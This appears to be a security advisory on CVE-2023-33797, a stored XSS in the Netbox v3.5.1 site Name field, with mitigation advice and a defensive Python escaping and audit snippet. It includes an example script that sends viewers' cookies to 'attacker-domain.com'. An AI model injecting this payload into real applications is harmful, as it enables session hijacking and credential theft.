CVE-2023-33797 - Netbox v3.5.1 Stored Cross-Site Scripting (XSS) Vulnerability in Create Sites Function

A stored cross-site scripting (XSS) vulnerability has been identified in the Create Sites (/dcim/sites/) function of Netbox v3.5.1. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the Name field. This vulnerability has been assigned the CVE identifier CVE-2023-33797.

Description

Netbox is a popular open-source tool for managing IP address spaces, data center infrastructure, and networks. The Create Sites function in v3.5.1 allows administrators to create and manage various sites for their infrastructure. Unfortunately, this function is susceptible to a stored XSS vulnerability, which can be exploited by attackers to manipulate the web interface and potentially gain unauthorized access to sensitive information and features.

How the exploit works

An attacker can create a crafted payload containing malicious JavaScript or HTML code and insert it into the Name field during the site creation process. Once the site is created, the injected code is stored and executed whenever the site page is loaded by other users. This exploit can be used to steal user credentials, redirect users to malicious websites, or perform unauthorized actions on the victim's behalf.

One example of a potentially malicious payload is as follows:

<script>
  // Sends the viewing user's cookies to a domain the attacker controls
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://attacker-domain.com/steal?cookie=' + encodeURIComponent(document.cookie));
  xhr.send();
</script>

When this snippet is injected into the Name field, it attempts to send the user's cookies, including their session cookie, to the attacker's domain. If successful, this could allow an attacker to hijack the user's session and perform unauthorized actions in the Netbox interface.

This vulnerability has been reported on the Netbox GitHub repository:

- Issue #7207
- Issue #7311

The official CVE record can be found here:
- CVE-2023-33797

Mitigation and solution

The developers of Netbox have been notified of this vulnerability, and a patch has been released in version 3.5.2 to address the issue. It is strongly recommended that users update to the latest version of Netbox immediately to mitigate this vulnerability. If updating is not possible, users should refrain from utilizing the Create Sites function or restrict access to trusted users only.

Further recommendations include proper input validation and sanitization of the Name field so that injected markup is never rendered as code. Additionally, administrators should train users to recognize potential XSS vulnerabilities and to avoid clicking untrusted links or downloading suspicious files.
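As an added illustration (not code from this advisory or from the Netbox project), the following Python contrasts the unsafe rendering pattern behind a stored XSS with HTML-escaped output, and audits a constructed list of site records for names that carry markup, as an operator might after upgrading to 3.5.2. The record shape and function names are assumptions for the example.

```python
import html
from html.parser import HTMLParser

# Constructed sample records shaped like the "name" field of Netbox site objects;
# real data would come from the /dcim/sites/ page or an export of it.
SAMPLE_SITES = [
    {"id": 1, "name": "DC-Frankfurt-01"},
    {"id": 2, "name": "<script>alert(1)</script>"},
    {"id": 3, "name": "Lab <b>East</b>"},
    {"id": 4, "name": "Edge & Core (rack A)"},
]


def render_site_unsafe(name: str) -> str:
    """Vulnerable pattern: the stored name is interpolated verbatim into HTML."""
    return f"<h1>{name}</h1>"


def render_site_escaped(name: str) -> str:
    """Hardened pattern: escape on output so the browser shows literal text."""
    return f"<h1>{html.escape(name, quote=True)}</h1>"


class _TagDetector(HTMLParser):
    """Records every tag encountered in a value that should be plain text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.tags.append(tag)


def contains_markup(value: str) -> bool:
    """True if the value parses as containing at least one HTML tag."""
    parser = _TagDetector()
    parser.feed(value)
    parser.close()
    return bool(parser.tags)


def audit_site_names(sites) -> list[int]:
    """Return ids of sites whose name carries markup, for clean-up after patching."""
    return [s["id"] for s in sites if contains_markup(s["name"])]
```

Names flagged by the audit should be reviewed and corrected in the interface; a plain ampersand or angle bracket used as text is not reported, only parseable tags are.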

Conclusion

The CVE-2023-33797 vulnerability is a serious issue that can lead to unauthorized access and potential data breaches in the Netbox platform. It is crucial for administrators to update their systems and implement security best practices to mitigate this stored XSS vulnerability. By staying informed about emerging security threats and implementing proactive measures, organizations can better protect their IT infrastructure and sensitive data.

Timeline

Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC